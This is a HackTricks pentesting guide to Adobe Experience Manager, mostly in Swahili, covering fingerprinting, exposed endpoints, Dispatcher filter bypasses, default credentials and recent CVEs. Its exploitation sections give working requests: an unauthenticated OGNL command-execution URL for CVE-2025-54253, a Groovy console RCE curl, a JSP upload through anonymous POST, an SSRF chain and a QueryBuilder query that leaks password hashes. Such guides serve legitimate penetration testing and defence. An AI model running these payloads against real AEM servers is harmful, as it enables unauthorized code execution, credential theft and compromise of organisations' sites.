HackTricks
AEM (Adobe Experience Manager) Pentesting
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) ni CMS ya shirika inayofanya kazi juu ya Apache Sling/Felix (OSGi) na Java Content Repository (JCR). Kwa mtazamo wa mshambulizi, instances za AEM mara nyingi huonyesha development endpoints hatari, kanuni dhaifu za Dispatcher, default credentials na safu ndefu ya CVEs ambazo zinarekebishwa kila robo.
Orodha ya ukaguzi hapa chini inalenga externally reachable (unauth) attack surface ambayo mara kwa mara inaonekana katika real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
/etc.clientlibs/static path present (returns JS/CSS)./libs/granite/core/content/login.htmlukurasa wa kuingia wenye bango la βAdobe Experience Managerβ.</script><!--/* CQ */-->maoni kwenye mwisho wa HTML.
2. Endpoints zisizo na uthibitisho zenye thamani kubwa
| Path | Unachopata | Maelezo |
|---|---|---|
/.json, /.1.json | Nodi za JCR kupitia DefaultGetServlet | Mara nyingi imezuiliwa, lakini Dispatcher bypass (see below) inafanya kazi. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Leak ya mti wa kurasa, njia za ndani, majina ya watumiaji. |
/system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 kwa kawaida; ikiwa imefunuliwa & creds zitakapopatikana β bundle-upload RCE. |
/crx/packmgr/index.jsp | Package Manager | Inaruhusu content packages ziliothibitishwa β JSP payload upload. |
/etc/groovyconsole/** | AEM Groovy Console | Ikiwa imefunuliwa β utekelezaji wowote wa Groovy / Java. |
/libs/cq/AuditlogSearchServlet.json | Logi za ukaguzi | Ufunuo wa taarifa. |
/libs/cq/ui/content/dumplibs.html | Dump ya ClientLibs | XSS vector. |
/adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | Kwenye installs za Forms zilizosanidiwa vibaya (CVE-2025-54253) endpoint hii inatekeleza OGNL bila uthibitisho β RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Mara nyingi tovuti za uzalishaji ziko nyuma ya Dispatcher (reverse-proxy). Sheria za filter mara nyingi hupitishwa kwa kutumia wahusika walioencoded au extensions za static zilizokubaliwa.
Classic semicolon + allowed extension
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
If the Dispatcher allows encoded slashes, this returns JSON even when /bin is supposedly denied.
3. Mipangilio yasiyo sahihi ya kawaida (bado yapo 2026)
- Anonymous POST servlet β
POST /.jsonwith:operation=importinakuwezesha kuingiza node mpya za JCR. Blocking*.jsonPOST in the Dispatcher kunarekebisha. - World-readable user profiles β ACL ya default inampa kila mtu
jcr:readkwenye/home/users/**/profile/*. - Default credentials β
admin:admin,author:author,replication:replication. - WCMDebugFilter enabled β reflected XSS via
?debug=layout(CVE-2016-7882, bado inapatikana kwenye installs za legacy 6.4). - Groovy Console exposed β remote code execution kwa kutuma Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
- Dispatcher encoded-slash gap β
/bin/querybuilder.jsonand/etc/truststore.jsonzinafikiwa kwa%2f/%3Bhata wakati zimezuiwa na path filters. - AEM Forms Struts devMode left enabled β
/adminui/debug?expression=huendesha OGNL bila auth (CVE-2025-54253) ikisababisha unauth RCE; pamoja na XXE kwenye submission ya Forms (CVE-2025-54254) inaruhusu kusoma faili.
4. Udhaifu za hivi karibuni (service-pack cadence)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS β code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) β upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962β¦74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | β€ 6.5.18 | DOM-based XSS via crafted URL. |
Always check the APSB bulletin matching the customerβs service-pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Sasa omba /content/evil.jsp β JSP inakimbia kwa mtumiaji wa mchakato wa AEM.
5.2 SSRF to RCE (historical < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py kutoka kwa aem-hacker inaotomatisha mnyororo mzima.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
Ikiwa dhaifu, mwili wa HTTP unaonyesha matokeo ya amri.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Inarudisha node za watumiaji zikiwemo hash za rep:password wakati anonymous read ACLs ziko kwa default.
6. Vifaa
- aem-hacker β script ya enumeration ya Swiss-army, inasaidia dispatcher bypass, SSRF detection, default-creds checks na zaidi.
python3 aem_hacker.py -u https://target --host attacker-ip
- Tenable WAS plugin 115065 β Inagundua QueryBuilder hash disclosure & encoded-slash bypass moja kwa moja (ilichapishwa Desemba 2025).
- Content brute-force β omba kwa mfululizo
/_jcr_content.(json|html)ili kugundua vipengele vilivyofichwa. - osgi-infect β pakia bundle ya OSGi yenye madhara kupitia
/system/console/bundlesikiwa creds zinapatikana.
Marejeo
- Adobe Security Bulletin APSB25-115 β Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer β Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.